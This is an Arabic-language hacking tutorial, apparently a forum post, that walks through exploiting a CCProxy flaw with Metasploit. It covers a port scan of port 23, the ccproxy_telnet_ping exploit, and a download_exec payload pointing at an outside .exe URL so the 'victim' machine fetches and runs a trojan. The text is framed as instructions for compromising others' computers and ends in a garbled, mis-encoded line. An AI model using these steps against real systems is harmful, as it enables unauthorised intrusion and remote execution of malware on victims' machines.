شـرح إستغلآل ثغرهـ سسي بـروكسسي لإخترآق الجهـآز المسستهدف [!!] .....|
ـأول ششي نسـوي سكآن علـى الإيبي ونشـوف بورت البرنـآمج مفـتوح فـيه ولآلآ:
بنسوي سكان بأداه {auxiliary}
بـورت الـسي
بروكسي الإفترآضضي هو 23
[+]show auxiliary
scanner/portscan/tcp[+]
use scanner/portscan/tcp[+]
show options[+]
Ports :لتحديد البورتات الي بنفحصهـآ
[+]rhost :ايبي المستهدف [الضحيه]ض1
set ports 23-23
set RHOST 192.168.1.2~ مثآل فقـط على آيبي الضـحيه !!
run
tcp open 192.168.1.2:23
البورت مفتوح ,حلو الحين نسوي
[+] show exploits
ثـم نختـآر
windows/proxy/ccproxy_telnet_ping[+]
ثـم
use windows/proxy/ccproxy_telnet_ping
هذه الصورة تم اعادة تحجيمها اضغط على الشريط الاصفر للحصول على الحجم الاصلي حجم الصورة الاصلي هو 646x34 ومساحتها 1 كيلو بايت
!! ملاحظـه :طبعاً يمـديك إختـرآق الجهـآز ببآتش
مـن خلآل الـpayloads
طبعاً لو تبي تظهـر البآيلودز كلهم إكتب show payloads ^_+
, وإذا تبي تسوي البآيلود الفلآني تحط use payload
o_O
إسم البآيلود الي يخلينا نرفع البآتشش
widows/download_exec
[+]set payload windows/download_exec
ـأوكي الحين بعد ماحطينا البآيلود حق الرفـع نضغـط
[+]show options
هذه الصورة تم اعادة تحجيمها اضغط على الشريط الاصفر للحصول على الحجم الاصلي حجم الصورة الاصلي هو 688x246 ومساحتها 23 كيلو بايت
مثل مآقلنا
rhost : الضحيـه [الهدف] ض1
ports : 23 االبورت الي هو حق السي بروكسي
url : رآببط بآآتششششك المبـآآآششششر
ـأوكي الحين
set RHOST 192.168.1.2 ؛ نحط ايبي الضحـيه
نضغط إنتر , والحين نحط البآآتشش
set Url
www.sa-hacker.com/death-note.exe
ثم show options
هذه الصورة تم اعادة تحجيمها اضغط على الشريط الاصفر للحصول على الحجم الاصلي حجم الصورة الاصلي هو 702x248 ومساحتها 7 كيلو بايت
طلع مـكتوب Yes
تمـآم ^^
مبـرووك عليك الإخترآق . لكن لاتنسى عشآن تشتغل الثغره تمام التمام تكت فـ الإخير
exploit
Vspan style="font-weight: bold; color: #ff0000;"Cydv l[hf:VLspanC avp Ysjyghg eyvi sd fv,;sd < hojvNr hglssjiJ]t !